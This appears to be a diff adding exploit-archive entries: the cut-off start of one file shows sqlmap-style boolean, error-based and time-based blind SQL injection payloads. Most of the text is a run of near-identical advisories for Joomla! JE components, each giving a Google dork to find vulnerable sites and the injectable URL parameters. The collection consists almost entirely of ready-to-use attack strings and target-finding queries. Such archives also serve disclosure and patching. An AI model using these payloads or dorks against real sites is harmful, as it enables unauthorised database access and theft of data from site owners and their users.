+	    Payload: p=31") AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4760=4760,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("eFds"="eFds
+
+	    Type: AND/OR time-based blind
+	    Title: MySQL >= 5.0.12 AND time-based blind
+	    Payload: p=31") AND SLEEP(5) AND ("kxQU"="kxQU
+
+# 3
+http://localhost/shopby/all?c=Turkey
+	Parameter: c (GET)
+	    Type: boolean-based blind
+	    Title: AND boolean-based blind - WHERE or HAVING clause
+	    Payload: c=Turkey' AND 9145=9145 AND 'tvKB'='tvKB
+
+	    Type: error-based
+	    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+	    Payload: c=Turkey' AND (SELECT 5928 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT (ELT(5928=5928,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'APFD'='APFD
+
+	    Type: AND/OR time-based blind
+	    Title: MySQL >= 5.0.12 AND time-based blind
+	    Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia

platforms/php/webapps/41330.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Classify Ads 1.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jeclassifyads
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/je-classify-ads/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jeclassifyads&view=item_detail&pro_id=[SQL]
+# # # # #

platforms/php/webapps/41331.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Gallery v1.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jegallery
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/je-gallery/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jegallery&view=photo_detail&photo_id=[SQL]
+# # # # #

platforms/php/webapps/41332.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Directory Ads 1.7 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jedirectory
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/je-directory/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.7
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jedirectory&view=item_detail&ditemid=[SQL]
+# # # # #

platforms/php/webapps/41333.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE QuoteForm - SQL Injection
+# Google Dork: inurl:index.php?option=com_jequoteform
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jequoteform
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jequoteform&view=form&Itemid=[SQL]
+# # # # #

platforms/php/webapps/41334.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Property Finder 1.6.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jepropertyfinder
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/je-property-finder/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.6.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jepropertyfinder&view=section_detail&sf_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jepropertyfinder&view=userprofile&userId=[SQL]
+# # # # #

platforms/php/webapps/41335.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Tour 2.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jetour
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/je-tour/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jetour&view=package_detail&pid=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jetour&view=package&cid=[SQL]
+# # # # #

platforms/php/webapps/41336.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Video Rate 1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jevideorate
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-video-rate/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video&cat_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video_detail&id=[SQL]
+# # # # #

platforms/php/webapps/41337.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE auction 1.6 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jeauction
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/e-commerce/auction/je-auction/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.6
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jeauction&view=event_detail&eid=[SQL]
+# # # # #

platforms/php/webapps/41338.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Auto 1.5 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jeauto
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/je-auto/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jeauto&view=item_detail&d_itemid=[SQL]
+# # # # #

platforms/php/webapps/41339.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Awd Song 1.8 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jeawdsong
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-awd-song/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jeawdsong&view=song_detail&id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jeawdsong&view=song_detail&id=1&contest_id=[SQL]
+# # # # #

platforms/php/webapps/41340.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component Hbooking 1.9.9 - SQL Injection
+# Google Dork: inurl:index.php?option=com_hbooking
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/hbooking/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.9.9
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_hbooking&view=roomlisting&temp=hotel&h_id=[SQL]
+# # # # #

platforms/php/webapps/41341.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Quiz 2.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jequizmanagement
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/je-quiz-component/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 2.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jequizmanagement&view=question&eid=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jequizmanagement&view=question_detail&Itemid=[SQL]
+# # # # #

platforms/php/webapps/41342.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Grid Folio - SQL Injection
+# Google Dork: inurl:index.php?option=com_jegridfolio
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jegridfolio
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jegridfolio&view=category_detail&id=[SQL]
+# # # # #

platforms/php/webapps/41343.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE K2 Multiple Form Story v1.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jek2storymultipleform
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: http://www.joomlaextensions.co.in/index.php?option=com_jeshop&view=category_detail&id=76&Itemid=112
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jek2storymultipleform&view=jesubmit&Itemid=[SQL]
+# # # # #

platforms/php/webapps/41344.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Form Creator v1.8 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jeformcr
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/forms/je-form-creator/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jeformcr&view=form&Itemid=[SQL]
+# # # # #

platforms/php/webapps/41345.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Portfolio Creator v1.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jeportfolio
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/je-portfolio/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jeportfolio&view=item_detail&d_itemid=[SQL]
+# # # # #

platforms/php/webapps/41346.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Ticket System v1.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_jeticket
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/je-ticket-system/
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jeticket&view=assign_detail&cid[0]=[SQL]
+# # # # #

platforms/php/webapps/41347.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component JE Messanger - SQL Injection
+# Google Dork: inurl:index.php?option=com_jemessenger
+# Date: 13.02.2017
+# Vendor Homepage: http://www.joomlaextension.biz/
+# Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jemessenger
+# Demo: http://www.joomlaextension.biz/demo/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Inbox&task=edit&Itemid=1496&cid[0]=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Outbox&task=edit&Itemid=1496&cid[0]=[SQL]
+# http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Trash&task=edit&Itemid=1496&cid[0]=[SQL]
+# # # # #